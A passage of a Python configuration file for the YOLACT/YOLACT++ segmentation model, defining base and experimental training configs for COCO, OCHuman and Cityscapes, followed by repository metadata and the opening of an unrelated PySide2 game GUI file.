# - mask_proto_coeff_diversity_loss (bool): Apply coefficient diversity loss on the coefficients so that the same
# instance has similar coefficients.
# - mask_proto_coeff_diversity_alpha (float): The weight to use for the coefficient diversity loss.
# - mask_proto_normalize_emulate_roi_pooling (bool): Normalize the mask loss to emulate roi pooling's affect on loss.
# - mask_proto_double_loss (bool): Whether to use the old loss in addition to any special new losses.
# - mask_proto_double_loss_alpha (float): The alpha to weight the above loss.
# - mask_proto_split_prototypes_by_head (bool): If true, this will give each prediction head its own prototypes.
# - mask_proto_crop_with_pred_box (bool): Whether to crop with the predicted box or the gt box.
'lincomb': 1,
})
# ----------------------- ACTIVATION FUNCTIONS ----------------------- #
activation_func = Config({
'tanh': torch.tanh,
'sigmoid': torch.sigmoid,
'softmax': lambda x: torch.nn.functional.softmax(x, dim=-1),
'relu': lambda x: torch.nn.functional.relu(x, inplace=True),
'none': lambda x: x,
})
# ----------------------- FPN DEFAULTS ----------------------- #
fpn_base = Config({
# The number of features to have in each FPN layer
'num_features': 256,
# The upsampling mode used
'interpolation_mode': 'bilinear',
# The number of extra layers to be produced by downsampling starting at P5
'num_downsample': 1,
# Whether to down sample with a 3x3 stride 2 conv layer instead of just a stride 2 selection
'use_conv_downsample': False,
# Whether to pad the pred layers with 1 on each side (I forgot to add this at the start)
# This is just here for backwards compatibility
'pad': True,
# Whether to add relu to the downsampled layers.
'relu_downsample_layers': False,
# Whether to add relu to the regular layers
'relu_pred_layers': True,
})
# ----------------------- CONFIG DEFAULTS ----------------------- #
coco_base_config = Config({
'dataset': coco2014_dataset,
'num_classes': 81, # This should include the background class
'max_iter': 400000,
# The maximum number of detections for evaluation
'max_num_detections': 100,
# dw' = momentum * dw - lr * (grad + decay * w)
'lr': 1e-3,
'momentum': 0.9,
'decay': 5e-4,
# For each lr step, what to multiply the lr with
'gamma': 0.1,
'lr_steps': (280000, 360000, 400000),
# Initial learning rate to linearly warmup from (if until > 0)
'lr_warmup_init': 1e-4,
# If > 0 then increase the lr linearly from warmup_init to lr each iter for until iters
'lr_warmup_until': 500,
# The terms to scale the respective loss by
'conf_alpha': 1,
'bbox_alpha': 1.5,
'mask_alpha': 0.4 / 256 * 140 * 140, # Some funky equation. Don't worry about it.
# Eval.py sets this if you just want to run YOLACT as a detector
'eval_mask_branch': True,
# Top_k examples to consider for NMS
'nms_top_k': 200,
# Examples with confidence less than this are not considered by NMS
'nms_conf_thresh': 0.05,
# Boxes with IoU overlap greater than this threshold will be culled during NMS
'nms_thresh': 0.5,
# See mask_type for details.
'mask_type': mask_type.direct,
'mask_size': 16,
'masks_to_train': 100,
'mask_proto_src': None,
'mask_proto_net': [(256, 3, {}), (256, 3, {})],
'mask_proto_bias': False,
'mask_proto_prototype_activation': activation_func.relu,
'mask_proto_mask_activation': activation_func.sigmoid,
'mask_proto_coeff_activation': activation_func.tanh,
'mask_proto_crop': True,
'mask_proto_crop_expand': 0,
'mask_proto_loss': None,
'mask_proto_binarize_downsampled_gt': True,
'mask_proto_normalize_mask_loss_by_sqrt_area': False,
'mask_proto_reweight_mask_loss': False,
'mask_proto_grid_file': 'data/grid.npy',
'mask_proto_use_grid': False,
'mask_proto_coeff_gate': False,
'mask_proto_prototypes_as_features': False,
'mask_proto_prototypes_as_features_no_grad': False,
'mask_proto_remove_empty_masks': False,
'mask_proto_reweight_coeff': 1,
'mask_proto_coeff_diversity_loss': False,
'mask_proto_coeff_diversity_alpha': 1,
'mask_proto_normalize_emulate_roi_pooling': False,
'mask_proto_double_loss': False,
'mask_proto_double_loss_alpha': 1,
'mask_proto_split_prototypes_by_head': False,
'mask_proto_crop_with_pred_box': False,
# SSD data augmentation parameters
# Randomize hue, vibrance, etc.
'augment_photometric_distort': True,
# Have a chance to scale down the image and pad (to emulate smaller detections)
'augment_expand': True,
# Potentialy sample a random crop from the image and put it in a random place
'augment_random_sample_crop': True,
# Mirror the image with a probability of 1/2
'augment_random_mirror': True,
# Flip the image vertically with a probability of 1/2
'augment_random_flip': False,
# With uniform probability, rotate the image [0,90,180,270] degrees
'augment_random_rot90': False,
# Discard detections with width and height smaller than this (in absolute width and height)
'discard_box_width': 4 / 550,
'discard_box_height': 4 / 550,
# If using batchnorm anywhere in the backbone, freeze the batchnorm layer during training.
# Note: any additional batch norm layers after the backbone will not be frozen.
'freeze_bn': False,
# Set this to a config object if you want an FPN (inherit from fpn_base). See fpn_base for details.
'fpn': None,
# Use the same weights for each network head
'share_prediction_module': False,
# For hard negative mining, instead of using the negatives that are leastl confidently background,
# use negatives that are most confidently not background.
'ohem_use_most_confident': False,
# Use focal loss as described in https://arxiv.org/pdf/1708.02002.pdf instead of OHEM
'use_focal_loss': False,
'focal_loss_alpha': 0.25,
'focal_loss_gamma': 2,
# The initial bias toward forground objects, as specified in the focal loss paper
'focal_loss_init_pi': 0.01,
# Keeps track of the average number of examples for each class, and weights the loss for that class accordingly.
'use_class_balanced_conf': False,
# Whether to use sigmoid focal loss instead of softmax, all else being the same.
'use_sigmoid_focal_loss': False,
# Use class[0] to be the objectness score and class[1:] to be the softmax predicted class.
# Note: at the moment this is only implemented if use_focal_loss is on.
'use_objectness_score': False,
# Adds a global pool + fc layer to the smallest selected layer that predicts the existence of each of the 80 classes.
# This branch is only evaluated during training time and is just there for multitask learning.
'use_class_existence_loss': False,
'class_existence_alpha': 1,
# Adds a 1x1 convolution directly to the biggest selected layer that predicts a semantic segmentations for each of the 80 classes.
# This branch is only evaluated during training time and is just there for multitask learning.
'use_semantic_segmentation_loss': False,
'semantic_segmentation_alpha': 1,
# Adds another branch to the netwok to predict Mask IoU.
'use_mask_scoring': False,
'mask_scoring_alpha': 1,
# Match gt boxes using the Box2Pix change metric instead of the standard IoU metric.
# Note that the threshold you set for iou_threshold should be negative with this setting on.
'use_change_matching': False,
# Uses the same network format as mask_proto_net, except this time it's for adding extra head layers before the final
# prediction in prediction modules. If this is none, no extra layers will be added.
'extra_head_net': None,
# What params should the final head layers have (the ones that predict box, confidence, and mask coeffs)
'head_layer_params': {'kernel_size': 3, 'padding': 1},
# Add extra layers between the backbone and the network heads
# The order is (bbox, conf, mask)
'extra_layers': (0, 0, 0),
# During training, to match detections with gt, first compute the maximum gt IoU for each prior.
# Then, any of those priors whose maximum overlap is over the positive threshold, mark as positive.
# For any priors whose maximum is less than the negative iou threshold, mark them as negative.
# The rest are neutral and not used in calculating the loss.
'positive_iou_threshold': 0.5,
'negative_iou_threshold': 0.5,
# When using ohem, the ratio between positives and negatives (3 means 3 negatives to 1 positive)
'ohem_negpos_ratio': 3,
# If less than 1, anchors treated as a negative that have a crowd iou over this threshold with
# the crowd boxes will be treated as a neutral.
'crowd_iou_threshold': 1,
# This is filled in at runtime by Yolact's __init__, so don't touch it
'mask_dim': None,
# Input image size.
'max_size': 300,
# Whether or not to do post processing on the cpu at test time
'force_cpu_nms': True,
# Whether to use mask coefficient cosine similarity nms instead of bbox iou nms
'use_coeff_nms': False,
# Whether or not to have a separate branch whose sole purpose is to act as the coefficients for coeff_diversity_loss
# Remember to turn on coeff_diversity_loss, or these extra coefficients won't do anything!
# To see their effect, also remember to turn on use_coeff_nms.
'use_instance_coeff': False,
'num_instance_coeffs': 64,
# Whether or not to tie the mask loss / box loss to 0
'train_masks': True,
'train_boxes': True,
# If enabled, the gt masks will be cropped using the gt bboxes instead of the predicted ones.
# This speeds up training time considerably but results in much worse mAP at test time.
'use_gt_bboxes': False,
# Whether or not to preserve aspect ratio when resizing the image.
# If True, this will resize all images to be max_size^2 pixels in area while keeping aspect ratio.
# If False, all images are resized to max_size x max_size
'preserve_aspect_ratio': False,
# Whether or not to use the prediction module (c) from DSSD
'use_prediction_module': False,
# Whether or not to use the predicted coordinate scheme from Yolo v2
'use_yolo_regressors': False,
# For training, bboxes are considered "positive" if their anchors have a 0.5 IoU overlap
# or greater with a ground truth box. If this is true, instead of using the anchor boxes
# for this IoU computation, the matching function will use the predicted bbox coordinates.
# Don't turn this on if you're not using yolo regressors!
'use_prediction_matching': False,
# A list of settings to apply after the specified iteration. Each element of the list should look like
# (iteration, config_dict) where config_dict is a dictionary you'd pass into a config object's init.
'delayed_settings': [],
# Use command-line arguments to set this.
'no_jit': False,
'backbone': None,
'name': 'base_config',
# Fast Mask Re-scoring Network
# Inspried by Mask Scoring R-CNN (https://arxiv.org/abs/1903.00241)
# Do not crop out the mask with bbox but slide a convnet on the image-size mask,
# then use global pooling to get the final mask score
'use_maskiou': False,
# Archecture for the mask iou network. A (num_classes-1, 1, {}) layer is appended to the end.
'maskiou_net': [],
# Discard predicted masks whose area is less than this
'discard_mask_area': -1,
'maskiou_alpha': 1.0,
'rescore_mask': False,
'rescore_bbox': True,
'maskious_to_train': -1,
})
# ----------------------- YOLACT v1.0 CONFIGS ----------------------- #
yolact_base_config = coco_base_config.copy({
'name': 'yolact_base',
# Dataset stuff
'dataset': coco2017_dataset,
'num_classes': len(coco2017_dataset.class_names) + 1,
# Image Size
'max_size': 550,
# Training params
'lr_steps': (15000, 40000, 60000, 75000),
'max_iter': 140000,
# Backbone Settings
'backbone': resnet101_backbone.copy({
'selected_layers': list(range(1, 4)),
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': True, # This is for backward compatability with a bug
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[24], [48], [96], [192], [384]],
}),
# FPN Settings
'fpn': fpn_base.copy({
'use_conv_downsample': True,
'num_downsample': 2,
}),
# Mask Settings
'mask_type': mask_type.lincomb,
'mask_alpha': 6.125,
'mask_proto_src': 0,
'mask_proto_net': [(256, 3, {'padding': 1})] * 3 + [(None, -2, {}), (256, 3, {'padding': 1})] + [(32, 1, {})],
'mask_proto_normalize_emulate_roi_pooling': True,
# Other stuff
'share_prediction_module': True,
'extra_head_net': [(256, 3, {'padding': 1})],
'positive_iou_threshold': 0.5,
'negative_iou_threshold': 0.4,
'crowd_iou_threshold': 0.7,
'use_semantic_segmentation_loss': True,
})
yolact_im400_config = yolact_base_config.copy({
'name': 'yolact_im400',
'max_size': 400,
'backbone': yolact_base_config.backbone.copy({
'pred_scales': [[int(x[0] / yolact_base_config.max_size * 400)] for x in yolact_base_config.backbone.pred_scales],
}),
})
yolact_im700_config = yolact_base_config.copy({
'name': 'yolact_im700',
'masks_to_train': 300,
'max_size': 700,
'backbone': yolact_base_config.backbone.copy({
'pred_scales': [[int(x[0] / yolact_base_config.max_size * 700)] for x in yolact_base_config.backbone.pred_scales],
}),
})
yolact_darknet53_config = yolact_base_config.copy({
'name': 'yolact_darknet53',
'backbone': darknet53_backbone.copy({
'selected_layers': list(range(2, 5)),
'pred_scales': yolact_base_config.backbone.pred_scales,
'pred_aspect_ratios': yolact_base_config.backbone.pred_aspect_ratios,
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': True, # This is for backward compatability with a bug
}),
})
yolact_resnet50_config = yolact_base_config.copy({
'name': 'yolact_resnet50',
'backbone': resnet50_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_scales': yolact_base_config.backbone.pred_scales,
'pred_aspect_ratios': yolact_base_config.backbone.pred_aspect_ratios,
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': True, # This is for backward compatability with a bug
}),
})
yolact_resnet50_pascal_config = yolact_resnet50_config.copy({
'name': None, # Will default to yolact_resnet50_pascal
# Dataset stuff
'dataset': pascal_sbd_dataset,
'num_classes': len(pascal_sbd_dataset.class_names) + 1,
'max_iter': 120000,
'lr_steps': (60000, 100000),
'backbone': yolact_resnet50_config.backbone.copy({
'pred_scales': [[32], [64], [128], [256], [512]],
'use_square_anchors': False,
})
})
yolact_darknet_person_config = yolact_darknet53_config.copy({
'name': 'darknet_2',
'dataset': shivam_dataset,
'num_classes' : len(shivam_dataset.class_names)+1,
'max_iter' : 80000,
# 'freeze_bn': True,
'max_size': 512
})
yolact_im700_person_config = yolact_im700_config.copy({
'name': 'im700_2',
'dataset': person_dataset,
'num_classes' : len(person_dataset.class_names)+1,
'max_iter' : 80000,
# 'freeze_bn': True,
'max_size': 512
})
# ----------------------- YOLACT++ CONFIGS ----------------------- #
yolact_plus_base_config = yolact_base_config.copy({
'name': 'yolact_plus_base',
'backbone': resnet101_dcn_inter3_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'use_maskiou': True,
'maskiou_net': [(8, 3, {'stride': 2}), (16, 3, {'stride': 2}), (32, 3, {'stride': 2}), (64, 3, {'stride': 2}), (128, 3, {'stride': 2})],
'maskiou_alpha': 25,
'rescore_bbox': False,
'rescore_mask': True,
'discard_mask_area': 5*5,
})
yolact_plus_resnet50_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
})
yolact_plus_resnet101_person_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_101',
'dataset': shivam_dataset,
'num_classes' : len(shivam_dataset.class_names)+1,
'max_iter' : 100000,
# 'freeze_bn': True,
'max_size': 512
})
yolact_plus_resnet50_person_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_person',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': coco2017_dataset_person_1,
'num_classes': len(coco2017_dataset_person_1.class_names) + 1,
# Training params
'max_iter': 10000,
'lr': 1e-4,
'momentum': 0.9,
'decay': 5e-4,
'gamma': 0.1,
'lr_steps': (.35 * 10000, .75 * 10000, .88 * 10000, .93 * 10000),
})
yolact_plus_resnet50_ochuman_exp1_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_ochuman_exp1',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': ochuman_dataset,
'num_classes': len(ochuman_dataset.class_names) + 1,
# Training params
'max_iter': 7000,
# 'lr': 1e-4,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 7000, .75 * 7000, .88 * 7000, .93 * 7000),
})
yolact_plus_resnet50_ochuman_exp2_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_ochuman_exp2',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': ochuman_dataset,
'num_classes': len(ochuman_dataset.class_names) + 1,
# Training params
'max_iter': 3000,
# 'lr': 1e-5,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 3000, .75 * 3000, .88 * 3000, .93 * 3000),
})
yolact_plus_resnet50_ochuman_exp3_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_ochuman_exp3',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': ochuman_dataset,
'num_classes': len(ochuman_dataset.class_names) + 1,
# Training params
'max_iter': 3000,
# 'lr': 1e-5,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 3000, .75 * 3000, .88 * 3000, .93 * 3000),
})
yolact_plus_resnet50_cityscapes_exp4_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp4',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp5_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp5',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/3,1/4,1/2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp6_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp6',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/2,1/4,1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp7_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp7',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/2,1/4,1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [32, 64, 128, 256, 512]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp8_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp8',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/2,1/4,1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# In this experiment I changed this to preserve the original image aspect ratio
'preserve_aspect_ratio': True,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp9_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp9',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/2,1/4,1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 3000,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 3000, .75 * 3000, .88 * 3000, .93 * 3000),
})
yolact_plus_resnet50_cityscapes_exp10_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp10',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/2,1/4,1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 40000,
# 'lr': 1e-5,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 40000, .75 * 40000, .88 * 40000, .93 * 40000),
})
yolact_plus_resnet50_cityscapes_exp11_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp11',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp12_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp12',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-4,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp13_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp13',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-5,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp14_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp14',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1/2, 1/4, 1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 1500,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 1500, .75 * 1500, .88 * 1500, .93 * 1500),
})
yolact_plus_resnet50_cityscapes_exp15_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp15',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
'pred_aspect_ratios': [ [[1/2, 1/4, 1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 3000,
# 'lr': 1e-3,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 3000, .75 * 3000, .88 * 3000, .93 * 3000),
})
yolact_plus_resnet50_cityscapes_exp16_config = yolact_plus_base_config.copy({
'name': 'yolact_plus_resnet50_cityscapes_exp16',
'backbone': resnet50_dcnv2_backbone.copy({
'selected_layers': list(range(1, 4)),
# In this experiment I changed this to reflect person aspect ratios.
'pred_aspect_ratios': [ [[1/2,1/4,1]] ]*5,
'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
'use_pixel_scales': True,
'preapply_sqrt': False,
'use_square_anchors': False,
}),
'dataset': cityscapes_dataset,
'num_classes': len(cityscapes_dataset.class_names) + 1,
# Disable augment_expand to avoid memory overflow
'augment_expand': False,
# Training params
'max_iter': 6000,
# 'lr': 1e-5,
# 'momentum': 0.9,
# 'decay': 5e-4,
# 'gamma': 0.1,
'lr_steps': (.35 * 6000, .75 * 6000, .88 * 6000, .93 * 6000),
})
# Default config
cfg = yolact_base_config.copy()
def set_cfg(config_name:str):
""" Sets the active config. Works even if cfg is already imported! """
global cfg
# Note this is not just an eval because I'm lazy, but also because it can
# be used like ssd300_config.copy({'max_size': 400}) for extreme fine-tuning
cfg.replace(eval(config_name))
if cfg.name is None:
cfg.name = config_name.split('_config')[0]
def set_dataset(dataset_name:str):
""" Sets the dataset of the current config. """
cfg.dataset = eval(dataset_name)
| [
"noreply@github.com"
] | SHIVAM3052.noreply@github.com |
11564982938ee31a8e00330067dd8ceab24242ea | 20f8804c95ab680291771105ff2ac82a440a8e22 | /game_gui2.py | d5afe9a24f3a1078209e08f878a5945d3b5983ea | [] | no_license | azidanit/FP-KB-2020-Ayo-Main-Game | d685e746ea55a5756c3fbf0cd3484ce052adb2b9 | 25c401e2fa8837112deae9c72904bc7c4335b797 | refs/heads/master | 2022-08-06T16:03:38.785524 | 2020-05-30T02:07:52 | 2020-05-30T02:07:52 | 259,441,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,959 | py | from PySide2 import QtWidgets, QtGui
from PySide2.QtCore import Slot, Signal
from Assets.Ui_Form import Ui_Form
from TheGame import TheGame
from GameState2 import GameState
class GameGui(Ui_Form):
playerTurnSignal = Signal(int)
def __init__(self, Form):
super().__init__()
self.the_game = TheGame()
self.setupUi(Form)
self.ingame_frame.hide()
self.home_frame.raise_()
self.connectWidget()
self.initGuiProperty()
Form.show()
self.clicked_player = ""
# self.ai_clicked = None
# self.the_game.start()
def connectWidget(self):
self.start_button.clicked.connect(self.startButtonClicked)
self.player_left.mousePressEvent = self.playerLeftClicked
self.player_right.mousePressEvent = self.playerRightClicked
self.ai_left.mousePressEvent = self.aiLeftClicked
self.ai_right.mousePressEvent = self.aiRightClicked
self.playerTurnSignal.connect(self.the_game.playGame)
self.the_game.resultStateSignal.connect(self.stateResultCallback)
def initGuiProperty(self):
self.player_left.setText("")
self.player_right.setText("")
self.changePlayerLeftHandTo(1)
self.changePlayerRightHandTo(1)
